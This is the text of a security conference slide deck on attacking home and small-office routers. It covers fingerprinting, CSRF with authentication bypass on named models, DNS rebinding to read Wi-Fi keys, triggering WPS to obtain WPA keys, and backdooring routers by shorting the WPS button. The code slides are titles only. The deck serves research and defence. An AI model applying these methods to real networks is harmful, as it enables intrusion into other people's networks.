Title: Hacking The Network Inside Out
1Hacking The Network Inside Out
- Craig Heffner, Derek Yap
- SourceSec Security Research
2Who Are We?
- Co-founders of SourceSec Security Research Group
- Publish research papers, tutorials, exploits, etc
- Columnist at EthicalHacker.net
3Presentation Purpose
- Discuss SOHO router attacks
- Performing router reconnaissance
- Identifying router vulnerabilities
- Exploiting vulnerabilities with client-side
attacks - Building hardware back doors
- Release some new tools
- Everybody likes new toys, right?
4Reconnaissance
5Router Reconnaissance
- You can't attack what you don't know
- Well, you can, but it's not recommended
- We need to be able to fingerprint routers
- Both externally and via WiFi
- What tools do we have to do this?
- Unfortunately, not many
6External Router Fingerprinting
- Nmap
- Great scanner, lots of TCP/IP signatures
- But only works if the router has an open WAN port
7Client-Side Fingerprinting
- Lan Scan
- JavaScript / CSS based LAN scanner
- IDs router make/model and IP address
- http//www.businessinfo.co.uk/
8JavaScript LAN Scan In Action
9WiFi Fingerprinting
- There isn't much currently available
- What is available mostly focuses on
- Fingerprinting client drivers
- Fingerprinting individual 802.11 devices
- Typically rely on RF signaling, time skews, etc
- Not so easy to use / update / maintain
10802.11 Information Elements
11Tool Time WiFinger
- Passively identifies APs based on beacon packets
- Examines 802.11 Information Elements
- Existence, order, contents, etc
- Only works on APs that it has signatures for
- Send us pcap files!
12WiFinger In Action
13Tool Time WPScan
- Actively probes AP for device information
- Takes advantage of WPS probe response IE
- Can contain lots of juicy info about the device
- Some routers give up more information than others
14WPScan In Action
15Tool Time WPSpy
- Monitors WPS state changes
- Tells you if WPS is configured
- Tells you when a router is listening for WPS
clients
16WPSpy In Action
17Why Do We Want To Know?
- Google for vulnerabilities
- Anything specific for that model router?
- Anything for similar models from the same vendor?
- Get user guide and manufacturer description
- What features does it support?
- Default settings?
- Go get the same router and test it
- Zero days are fun!
18What Are We Looking For?
- Type of HTTP authentication
- Basic Authentication? HTML form authentication?
- Router host name / default IP address
- Supported features
- WiFi Protected Setup support is a plus
19WiFi Protected Setup
- Used for WPA key distribution
- Push a button on the router
- Push a button on the client
- Router encrypts WPA key and sends it to client
- Not well supported by clients yet
- wpa_supplicant now supports WPS
- Most new routers have WPS enabled by default
20WiFi Protected Setup
- WPS push button authentication
- Push a button on the router
- Router advertises that it's looking for a client
- Client has two minutes to respond
- Push a button on the client device
- Client checks if the access point is looking for
a client - Client initiates 802.11 EAP exchange
- Router gives the client the encryption key
- Key exchange is encrypted
21Client-Side Attacks
22Why Use Client-Side Attacks?
- Most router vulnerabilities exist only on the LAN
- Usually in the Web-based administrative interface
- Routers usually must be managed from the LAN
- Remote management is rarely enabled
- Before we can consider router vulnerabilities
- How do we attack the LAN without direct LAN
access?
23Client-Side Attack Overview
- Use an inside client to help us attack the router
- Typically via the client's Web browser
- We'll cover two primary attack methods
- Cross-Site Request Forgery
- Anti-DNS pinning
- Most other methods aren't as useful in this case
24CSRF Problems
- For CSRF to work, the router must trust the
browser - No one ever logs into their router
- We can try to force a login, but...
- No auto-login for basic authentication
- http//userpassword_at_192.168.1.1/
- Blocked by IE and FF
- Changes in the IP address range
- If IP of the router is not known, it can't be
targeted
25CSRF Solutions
- Most new routers make CSRF much easier
- Use HTML forms for submitting authentication
- Assign themselves host names
- Don't distinguish between POST and GET requests
26Sample CSRF Attack Code
27Bypassing Authentication
- Some routers don't check if you've logged in
- Don't have to guess any logins
- Makes CSRF attacks much more reliable
- Typically just a direct request to a CGI script
- More common than you might think
- Linksys WRT54G v1.00.9
- 3Com OfficeConnect Wireless Cable/DSL Router
- DD-WRT v24-sp1
- Most Belkin routers
28CSRF Auth Bypass Attack Code
29CSRF Pros
- Login to the router with default credentials
- Or bypass login altogether
- Issue updates to router configuration
- Typically can be done without any JavaScript
30CSRF Cons
- Not all routers vulnerable to CSRF
- We have to guess the login, or use default login
- Because of this, it doesn't work against basic
auth - This is mitigated if auth bypass vulnerability
exists - We can only change settings, not view settings
- Due to browser's same-domain policy
31Anti-DNS Pinning
- Using anti-DNS pinning, we can
- Circumvent same-domain policy
- Load and control the router admin page
- Unlike CSRF, we can use basic authentication
- No router vulnerabilities required!
- This allows us to change and view router settings
- WEP / WPA keys, DNS settings, firewall rules, etc
32What Is The Same-Domain Policy?
- Prevents site X from accessing contents of site Y
- Example
- Page on site X creates an iframe that points to
site Y - Iframe is successfully created
- But site X code can't access the iframe contents
33What Is DNS Pinning?
- Browser caches results from first DNS lookup
- Cache cleared when browser is closed
- Prevents evil.com from changing their IP
- New IP points to another server
- Allows attacker to bypass same-domain policy
34Anti-DNS Pinning Prerequisites
- We have to know the router IP address
- This is rarely changed from the default
- We have to be able to login
- Use default credentials
- Or circumvent the login process altogether
- We have to own a domain
- DNS server
- Web server
35Browser Queries DNS Server
Client's Router 192.168.1.1
ns1.sourcesec.com
Where is cc.sourcesec.com?
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
36DNS Responds With Two IPs
Client's Router 192.168.1.1
ns1.sourcesec.com
IN A 1.2.3.4 IN A 192.168.1.1
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
37Browser Connects To First IP
Client's Router 192.168.1.1
ns1.sourcesec.com
GET /evil.html HTTP/1.1
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
38Server Responds With Evil Page
Client's Router 192.168.1.1
ns1.sourcesec.com
lthtmlgt ltscriptgt ...Evil Script... lt/scriptgt lt/htm
lgt
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
39Web Service Shuts Down
Client's Router 192.168.1.1
ns1.sourcesec.com
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
40JS Initiates New Connection
Client's Router 192.168.1.1
ns1.sourcesec.com
GET /index.html HTTP/1.1 Host cc.sourcesec.com
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
41Browser Sees A Failed Connection
Client's Router 192.168.1.1
ns1.sourcesec.com
TCP RST Packet
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
42Browser Tries The Second IP
Client's Router 192.168.1.1
ns1.sourcesec.com
GET /index.html HTTP/1.1 Host cc.sourcesec.com
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
43JS Has Full Access To Router Page
Client's Router 192.168.1.1
ns1.sourcesec.com
lthtmlgt lttitlegtHome Routerlt/titlegt ...
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
44Anti-DNS Pinning Pros
- Doesn't rely on any vulnerabilities in the router
- Works with basic authentication
- Allows JS to access the router's Web content
45Anti-DNS Pinning Cons
- Still have to know / guess the router credentials
- Use default login
- Sends wrong host header
- But the router doesn't mind
- Doesn't send cookie credentials
- But routers don't use cookies anyway
46Client-Side WiFi Attacks
47Why WiFi?
- Often, simply changing settings is not desirable
- Router behind corporate firewall
- More likely to be noticed
- Against pen-test ROE
- WiFi provides direct access to internal network
- Most other attack methods require a multi-step
process
48Router WiFi Attacks
- Encryption is typically the only real WiFi
security - Traditional WiFi attacks
- Use kismet aircrack to crack WEP key
- WPA / WPA2 are tougher
- Client-side WiFi attacks
- Get the router to give us the encryption key
49Cracking WPA With HTML Images
- Recall that WPS hands out WPA keys?
- WPS-capable routers have virtual WPS push buttons
- Located in the Web interface
- We can activate WPS via CSRF attacks
- CSRF WPS WPA Key
50Belkin F5D8233-4v3 CSRF Attack
51Network Reconnaissance
- Device identification
- WiFinger reports Belkin F5D8233-4v3
- WPScan reports Belkin
- Reconnaissance shows
- Web based login on LAN port 80
- Vulnerable to CSRF and authentication bypass
- WPS enabled by default
- Default IP address 192.168.2.1
52F5D8233-4v3 Attack
- Use CSRF to activate WPS
- Done with a single hidden image tag
- Listen for activation
- Use wpspy
- Perform WPS key exchange
- Use WPS-capable WiFi card
53HTML Exploit Code
54Client Visiting Site
55WPS Push Button Activated
56Success!
57CSRF WPS Attack Pros
- Crack WPA key of any strength in seconds
- Simple attack to implement
58CSRF WPS Attack Cons
- Requires proximity to WiFi network
- Requires CSRF vulnerability
- Requires WPS
59Cracking WiFi With A DNS Server
- Using an anti-DNS pinning attack, we can
- Retrieve SSID, encryption type and key remotely
- Foil anti-CSRF implementations
- Do so without the aid of WPS
- We will need to know
- Router login
- Router IP
60DIR-628 Anti-Pinning Attack
61Network Reconnaissance
- Device identification
- WiFinger reports D-Link DIR-628
- WPScan reports D-Link DIR-628
- Reconnaissance shows
- JavaScript-based anti-CSRF in login page
- User account with read-only access and blank
password - Default IP address of 192.168.0.1
62DIR-628 Attack
- Can't use CSRF we'll have to use anti-pinning
- Attack the user account
- Likely to be ignored / forgotten about
- All D-Links have both admin and user accounts
- Retrieve the WPA key, send it back to our server
63DNS Configuration
64Initial Browser Request
65Browser Window
66Success!
67Physical Attacks
68Probability of Physical Attacks
- If an attacker can obtain access to the router
- Before it enters an organization
- After it is installed inside an organization
- Then there is the threat of physical tampering
- Has happened to many other devices in the past...
69Hewlett Packard
70Creative
71Amazon
72Best Buy
73WalMart
74Physical Router Attacks
- But what can we do with routers?
- Not much without a lot of time and resources
- They run custom firmware
- Firmware will vary between vendors / models /
versions - Any malware will be customized to the vendor /
model - It's really hard to do, so it's not a threat
75WPS Physical Attacks Made Easy
- Push the router's WPS button
- This is as easy as it gets!
- Backdoor the WiFi encryption
- We are only really concerned with WPA
- WEP / open networks are backdoors in and of
themselves - This can be done very easily thanks to WPS...
76Hacking With Gum
77Gum Hack Description
- Short out the WPS button
- The router thinks the button is always pushed
- WPS will always be actively looking for clients!
- Cover up the WPS light
- It blinks when WPS is activated
78Linksys WRT160N Physical Attack
79Linksys WRT160N Reconnaissance
- Device identification
- WiFinger reports Linksys WRT160N
- WPScan reports Linksys WRT160N
- Reconnaissance shows
- Uses basic authentication
- No CSRF or authentication bypass vulnerabilities
- XSS vulnerability, but requires LAN access
- WPS enabled by default
80WPS Button Placement
81Linksys Board Top View
82Linksys Board Bottom View
83Tear Foil
84Fold Foil
85Foil Placement
86Board Placement
87Foil Fold 2
88Lights Out
89Finished
90Success!
91Gum Hack Pitfalls
- Noticeable on Linksy's wireless admin page
- Makes it not-so-stealthy
- Some routers require push, hold release
- Simply shorting the switch doesn't work
92Improving The Gum Hack
- Shortcomings can be overcome with NE555 timer
- Small, cheap timer IC
- Easy project, even for hardware beginners
- Works with nearly every WPS-capable router
93NE555 Circuit Description
- NE555 configured as an astable timer
- Shorts the button pins for 1.5 seconds, every 5
minutes - Simple circuit, low parts count
- 1 NE555 chip
- 1 Capacitor
- 1 Diode
- 3 Resistors
94NE555 Circuit Schematic
95NE555 Linksys
96NE555 D-Link
97NE555 Belkin
98Conclusion
- SOHO router security has a long way to go
- This is just a portion of vulnerabilities and
attacks - WPS is hazardous if underlying system is
vulnerable - Default logins / authentication bypassing, CSRF
attacks - Physical attacks
- Client side attacks don't just affect the clients
- Can be used to attack internal infrastructure
- Routers are prime targets
99Q A
100Resources
- Visit http//www.sourcesec.com for
- Tools
- Slides
- Papers
- Schematics
- Email us
- dev_at_sourcesec.com
101References
- Intranet Invasion Through Anti-DNS Pinning
- David Bryne, BlackHat 2007
- DNS problems with new DNS cache, Bugzilla
- https//bugzilla.mozilla.org/show_bug.cgi?id16287
1 - WiFi Protected Setup Knowledge Center
- http//www.wi-fi.org/wifi-protected-setup